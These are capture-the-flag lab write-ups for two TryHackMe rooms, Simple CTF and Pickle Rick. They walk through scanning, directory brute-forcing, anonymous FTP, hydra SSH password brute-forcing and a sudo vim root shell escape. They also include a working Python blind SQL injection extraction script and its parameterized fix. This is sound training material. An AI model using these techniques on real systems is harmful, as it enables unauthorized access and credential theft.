TryHackMe : Simple CTF

TryHackMe Room : https://tryhackme.com/room/easyctf

Aim : To get to the root of the machine and read the flag file.

Difficulty Level : Easy

Connect to the TryHackMe network using openvpn:

sudo openvpn /path/to/username.ovpn

Scanning and Enumeration

1. How many services are running under port 1000?

sudo nmap -sV --script vuln -p1-10000 -vv "Target IP"

(The --script vuln option is not needed for this question and makes the scan much slower and noisier; -sV alone gives the service banners we need.) The scan finds three open ports: 21 (FTP), 80 (HTTP) and 2222 (SSH). Only two of them, 21 and 80, are below port 1000, so the answer to question 1 is 2. The scan also points to a "/robots.txt" on the web server, but it contains nothing useful.

2. What is running on the higher port?

From the nmap scan above, the service on the higher port (2222) is SSH.
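Question 1 is easy to misread from a long scan, and the wording above (three open ports versus services under port 1000) is exactly where that happens. As an added example, not part of the original writeup, here is a small Python parser for nmap's grepable output (-oG) that lists the open ports and answers questions 1 and 2 mechanically. The scan text embedded in it is a constructed sample modelled on this host; the service banners are placeholders, not what the real scan printed.

```python
from collections import namedtuple

# Constructed sample of nmap grepable output (-oG) for a host like this one.
# Service banners are placeholders; they are not the page's real scan output.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 10.10.246.98 ()\tStatus: Up
Host: 10.10.246.98 ()\tPorts: 21/open/tcp//ftp//vsftpd/, 80/open/tcp//http//Apache httpd/, 2222/open/tcp//ssh//OpenSSH/\tIgnored State: closed (9997)
# Nmap done (constructed sample)
"""

OpenPort = namedtuple("OpenPort", "port proto service version")


def parse_gnmap(text):
    """Return the open ports found in grepable nmap output, sorted by port.

    Every entry in the 'Ports:' field looks like
    port/state/proto/owner/service/rpcinfo/version/ ; most of the seven
    slash-separated fields stay empty unless -sV was used.
    """
    found = []
    for line in text.splitlines():
        if "Ports:" not in line:
            continue  # header, footer or a Status-only line
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            fields = entry.strip().split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue  # closed/filtered ports are listed the same way
            found.append(OpenPort(int(fields[0]), fields[2], fields[4], fields[6]))
    return sorted(found)


def services_under(open_ports, limit=1000):
    """Open ports numbered strictly below `limit` (question 1 asks for 1000)."""
    return [p for p in open_ports if p.port < limit]


def highest_port_service(open_ports):
    """Service name on the highest open port (question 2)."""
    return max(open_ports, key=lambda p: p.port).service


if __name__ == "__main__":
    ports = parse_gnmap(SAMPLE_GNMAP)
    for p in ports:
        print(f"{p.port}/{p.proto}\t{p.service}\t{p.version}")
    print("services under port 1000:", len(services_under(ports)))
    print("highest port runs:", highest_port_service(ports))
```

Save the real scan with -oG scan.gnmap and feed that file to parse_gnmap instead of the sample; the parser only relies on the fixed field layout of the Ports: line, so it works the same on a 10000-port scan.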

3. What's the CVE you're using against the application?

To answer this we need more enumeration of the web server; "nikto" and "gobuster" serve for this purpose.

nikto -h "Target IP"

Nikto only reports the same "/robots.txt" we already saw.

Next, brute-force directories on the web root to see if there is anything of interest. Using "gobuster" (the URL needs a scheme; -x .php also requests each word with a .php extension):

gobuster dir -u http://target_ip -w wordlists/small.txt -t 200 -x .php -q

It finds "/simple", which we should check.

Visiting "/simple" shows a CMS, and its version is printed in the bottom left corner of the page:

CMS Made Simple version 2.2.8

To find known exploits for this version of CMS Made Simple, search exploit-db for it.

The answer to question 3 is the CVE of the exploit we will use: CVE-2019-9053.

4. To what kind of vulnerability is the application vulnerable?

The exploit-db entry for CVE-2019-9053 (CMS Made Simple before 2.2.10) describes a blind SQL injection, so the answer is SQL injection.
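To show what the bug class behind CVE-2019-9053 looks like in practice, here is an added example that is neither this writeup's code nor the public exploit: a hypothetical endpoint that pastes an id list straight into a query, the blind extraction loop an attacker runs against it, and the parameterized version that stops it. The table and column names, the endpoint's behaviour and the stored values are all assumptions made up for the illustration. The real vulnerability is time-based blind (the attacker measures a delay); here the endpoint's yes/no answer stands in for the timing measurement so the example runs offline against an in-memory SQLite database.

```python
import sqlite3

# In-memory stand-in for the CMS database. Table and column names and the
# stored values are constructed for this illustration; they are not taken
# from CMS Made Simple.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
    CREATE TABLE users(username TEXT, password TEXT);
    INSERT INTO users VALUES ('mitch', '5e8e3c0ffee0000deadbeef000000001');
""")


def vulnerable_endpoint(idlist):
    """Hypothetical handler with the CVE-2019-9053 bug class: the caller's id
    list is pasted straight into the SQL. It only reports whether any row came
    back, which is all a blind attacker gets (the real bug is time-based; a
    yes/no answer stands in for the timing measurement here)."""
    sql = f"SELECT id FROM news WHERE id IN ({idlist})"
    try:
        return bool(db.execute(sql).fetchall())
    except sqlite3.Error:
        return False


def safe_endpoint(idlist):
    """Hardened form: parse the list as integers and bind them as parameters.
    Anything that is not an integer raises ValueError before touching SQL."""
    ids = [int(x) for x in idlist.split(",")]
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id FROM news WHERE id IN ({placeholders})"
    return bool(db.execute(sql, ids).fetchall())


def extract(oracle, subquery, max_len=64):
    """Recover the single string `subquery` selects, one character at a time,
    using nothing but the oracle's yes/no answers. Each character costs one
    length probe plus a 7-step binary search over the ASCII range. The '1)'
    closes the IN list and '--' comments out the rest of the query."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1) AND length(({subquery})) >= {pos} -- "):
            break  # ran past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1) AND unicode(substr(({subquery}), {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    user = extract(vulnerable_endpoint, "SELECT username FROM users LIMIT 1")
    pw_hash = extract(vulnerable_endpoint, f"SELECT password FROM users WHERE username='{user}'")
    print(f"recovered {user}:{pw_hash}")
    print("hardened endpoint on '1,2':", safe_endpoint("1,2"))
```

The binary search is what makes blind extraction practical: about eight requests per character instead of trying every printable byte, which is why a single boolean (or timing) side channel is enough to pull usernames and password hashes out of a database. Note that the hardened endpoint does not try to filter the injection string; it refuses anything that is not an integer list and hands the values to the driver as bound parameters, so there is no string for an attacker to break out of.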

Exploitation

5. What’s the password?

To crack a password I first need a username to brute-force against. Since FTP (port 21) is open on the target, it is worth checking whether anonymous login is allowed:

ftp "target IP"

Log in with the username "anonymous"; when anonymous access is enabled any password is accepted (an e-mail address by convention). After a successful anonymous login we find a text file, and it gives us a candidate username for the target machine.

Now use hydra to brute-force the SSH password for the username "mitch" (10.10.246.98 is this instance's IP and will differ for you; hydra itself warns that SSH servers often limit parallel connections and recommends adding -t 4):

hydra -l mitch -P rockyou.txt ssh://10.10.246.98:2222

Hydra finds a password, and that is the answer to this question.

6. Where can you login with the details obtained?

7. What’s the user flag?

SSH is listening on port 2222, so log in as "mitch" with the recovered password:

ssh mitch@10.10.246.98 -p 2222

The user flag is in mitch's home directory (question 7); the answer to question 6 is ssh.

8. Is there any other user in the home directory? What’s its name?

ls /home

There is one more user; its name is the answer.

9. What can you leverage to spawn a privileged shell?

This question is the interesting one. Check what "mitch" is allowed to run through sudo:

sudo -l

vim can be run as root, so vim will be used to spawn a privileged shell.

10. What’s the root flag?

mitch may run vim as root with no password required (NOPASSWD in the sudo -l output). vim can execute shell commands from its ex command line, and -c runs an ex command as soon as vim starts, so launching it through sudo with :!/bin/sh drops us straight into a shell running as root:

sudo vim -c ':!/bin/sh'

We now have a root shell (running id in it reports uid 0).

The root flag is in /root:

ls /root -la

Reading the flag file listed there gives us the root flag!

The machine has been conquered.

TryHackMe : Pickle Rick

TryHackMe Room : https://tryhackme.com/room/picklerick

Aim : Exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Difficulty Level : Easy

Connect to the TryHackMe network using openvpn.

sudo openvpn /path/to/username.ovpn

First, open the URL provided on the room page in Firefox.

Nothing useful is visible on the page itself, but viewing the page source reveals a username for some login page.

Next we need a password and a login URL. For this we can run "gobuster" against the web root (the URL needs a scheme):

gobuster dir -u http://victim_IP -w /path/to/wordlist/common.txt -t 200 -x .php -q
gobuster dir -u http://victim_IP -w /path/to/wordlist/common.txt -t 200 -q

(The second run is redundant: with -x .php gobuster already requests each word both with and without the extension.)

We get some interesting results. "/robots.txt" contains a single line of text:

Well, it is Rick's nonsense catchphrase.

We also have a "/login.php" page.

A portal !

Logging in with the username found earlier and the catchphrase as the password succeeds. We land on a command panel; running ls -la in it gives:

The 1st and 3rd txt files look interesting; let's read their contents:

cat Sup3rS3cretPickl3Ingred.txt

Hmm, the cat command has been disabled. What we can do is look for alternatives to cat: "head", "tail", "less" and maybe more. head and tail turn out to be disabled too, but less works 🙂, and we get the 1st ingredient:

less Sup3rS3cretPickl3Ingred.txt

For the next clue, do the same with clue.txt:

less clue.txt

Ain't that going to be fun!

So we have to explore the filesystem to find the remaining ingredients.

Two directories are worth exploring, "/home" and "/root". Let's look at "/home" first, and then at /home/rick:

Well, well, well... ain't that funny.

We have found our 2nd ingredient. Now let's look in /root to see if there is something of value there.

Listing /root as the web server's user is denied, so obviously we have to put "sudo" in front of the command. It succeeds, which means the web application's user can run sudo without a password, a serious misconfiguration on its own. "3rd.txt" looks interesting, and reading it gives us the last ingredient. We have got all the ingredients now!

It’s time to make the potion to transform Rick back into a human from a pickle.

Mission Accomplished